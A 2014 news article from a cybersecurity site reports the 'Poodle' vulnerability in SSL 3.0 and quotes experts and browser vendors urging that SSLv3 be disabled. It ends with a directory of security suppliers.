Beware Poodle Bug!

Uploaded on 2014-10-20 in TECHNOLOGY-Key Areas-Social Media, FREE TO VIEW

Three Google researchers have uncovered a security bug in widely used web encryption technology that they say could allow hackers to take over accounts for email, banking and other services in what they have dubbed a "Poodle" attack.

The discovery of "Poodle," which stands for Padding Oracle On Downloaded Legacy Encryption, prompted makers of web browsers and server software to advise users on Tuesday to disable use of the source of the security bug: an 18-year old encryption standard known as SSL 3.0.
It was the third time this year that researchers have uncovered a vulnerability in widely used web technology, following April's "Heartbleed" bug in OpenSSL and last month's "Shellshock" bug in a piece of Unix software known as Bash.

It is the third time this year that researchers have uncovered a "Heartbleed" bug and last month's "Shellshock" bug.

Security experts said that hackers could steal browser "cookies" in "Poodle" attacks, potentially taking control of email, banking and social networking accounts. Even so, experts said the threat was not as serious as the two prior bugs.

"If Shellshock and Heartbleed were Threat Level 10, then Poodle is more like a 5 or a 6," said Tal Klein, vice president with cloud security firm Adallom.

The threat was disclosed in a research paper published on the website of the OpenSSL Project, which develops the most widely used type of SSL encryption software.

Rumors of a bug in SSL software had been circulating in recent days, prompting some security professionals to prepare for a major new threat this week.

Ivan Ristic, director of application security research with Qualys, said "Poodle" was not as serious as the previous threats because the attack was "quite complicated," requiring hackers to have privileged access to networks.

Jeff Moss, a cyber adviser to the U.S. Department of Homeland Security, said attackers would need to launch a "man-in-the-middle" attack, placing themselves between victims and websites using approaches such as creating rogue WiFi "hotspots" in Internet cafes.

Google suggested a technical workaround to secure web servers, but added on its blog that it hopes to eventually remove support for SSL 3.0 from all client software.

Mozilla plans to disable SSL 3.0 by default in the next version of its Firefox browser, to be released on Nov. 25. (mzl.la/1DaxOwY).

"SSL version 3.0 is no longer secure," Mozilla said on its blog. "Browsers and websites need to turn off SSLv3 and use more modern security protocols as soon as possible."

Microsoft Corp issued an advisory suggesting that customers disable SSL 3.0 on Windows for servers and PCs.

Representatives with Apple Inc could not be reached. An Oracle Corp spokeswoman had no immediate comment. Matthew Green, an assistant research professor of computer science at Johns Hopkins University said that disabling SSL 3.0 can be difficult for some computer users.
"It's not going to take out the infrastructure of the Internet. But it's going to be a hassle to fix," Green said.

« Two weeks to save your computer from major cyber attack
Newsletters »

CyberSecurity Jobsite
Perimeter 81
Cyrin

Real Attacks. Real Tools. Real Scenarios.
Schedule a demo

Sign Up: Cyber Security Intelligence Newsletter

Directory of Suppliers

ManageEngine

ManageEngine

As the IT management division of Zoho Corporation, ManageEngine prioritizes flexible solutions that work for all businesses, regardless of size or budget.

Jooble

Jooble

Jooble is a job search aggregator operating in 71 countries worldwide. We simplify the job search process by displaying active job ads from major job boards and career sites across the internet.

IT Governance

IT Governance

IT Governance is a leading global provider of information security solutions. Download our free guide and find out how ISO 27001 can help protect your organisation's information.

DigitalStakeout

DigitalStakeout

DigitalStakeout enables cyber security professionals to reduce cyber risk to their organization with proactive security solutions, providing immediate improvement in security posture and ROI.

ZenGRC

ZenGRC

ZenGRC (formerly Reciprocity) is a leader in the GRC SaaS landscape, offering robust and intuitive products designed to make compliance straightforward and efficient.

Skybox Security

Skybox Security

Skybox combines firewall and network device data with vulnerability and threat intelligence, putting security decisions in your unique network context.

Schneider Electric

Schneider Electric

Schneider Electric develops connected technologies and solutions to manage energy and process in ways that are safe, reliable and sustainable.

Sage Designs

Sage Designs

Sage Designs is a provider of SCADA, Security & Industrial Automation products and training programs.

Mnemonica

Mnemonica

Mnemonica specializes in providing data protection system, information security compliance solutions, cloud and managed services.

AVORD

AVORD

AVORD is a cloud-based security testing platform that allows clients to manage security testing requirements in a far more productive and efficient way.

Smart Contract Security Alliance

Smart Contract Security Alliance

The Smart Contract Security Alliance supports the blockchain ecosystem by building standards for smart contract security and smart contract audits.

NuID

NuID

NuID is a pioneer in trustless authentication and decentralized digital identity.

ImpactQA

ImpactQA

ImpactQA is a global leading software testing & QA consulting company. Ten years of excellence. Delivering unmatched services & digital transformation to SMEs & Fortune 500 companies.

Internet Security Research Group (ISRG)

Internet Security Research Group (ISRG)

ISRG's mission is to reduce financial, technological, and educational barriers to secure communication over the Internet.

NetWitness

NetWitness

NetWitness empowers security teams to rapidly detect today’s targeted and sophisticated attacks with unparalleled visibility.

NetGain Technologies

NetGain Technologies

NetGain Technologies helps small to medium-sized businesses gain access to expert IT talent. We provide strategies that use technology as a driving force behind business growth.

Tenable

Tenable

Organizations around the world rely on Tenable to help them understand and reduce cybersecurity risk across their attack surface—in the cloud or on-premises, from IT to OT and beyond.

Cranium

Cranium

AI is being implemented into every business process, but nobody knows whether their AI is secure. Our mission is to deliver security and trust to the AI revolution.

SecurityStudio

SecurityStudio

SecurityStudio is a continuous cybersecurity risk management platform that allows decision-makers to quickly identify the most immediate threats and make confident risk informed decisions.

Dispel

Dispel

Dispel makes the fastest secure remote access for industrial networks. Built by operators for operators: a zero trust engine for your entire OT, IoT, and xIoT stack.

TeamT5

TeamT5

TeamT5 Inc. is a leading cybersecurity company dedicated to cyber threat research and solutions.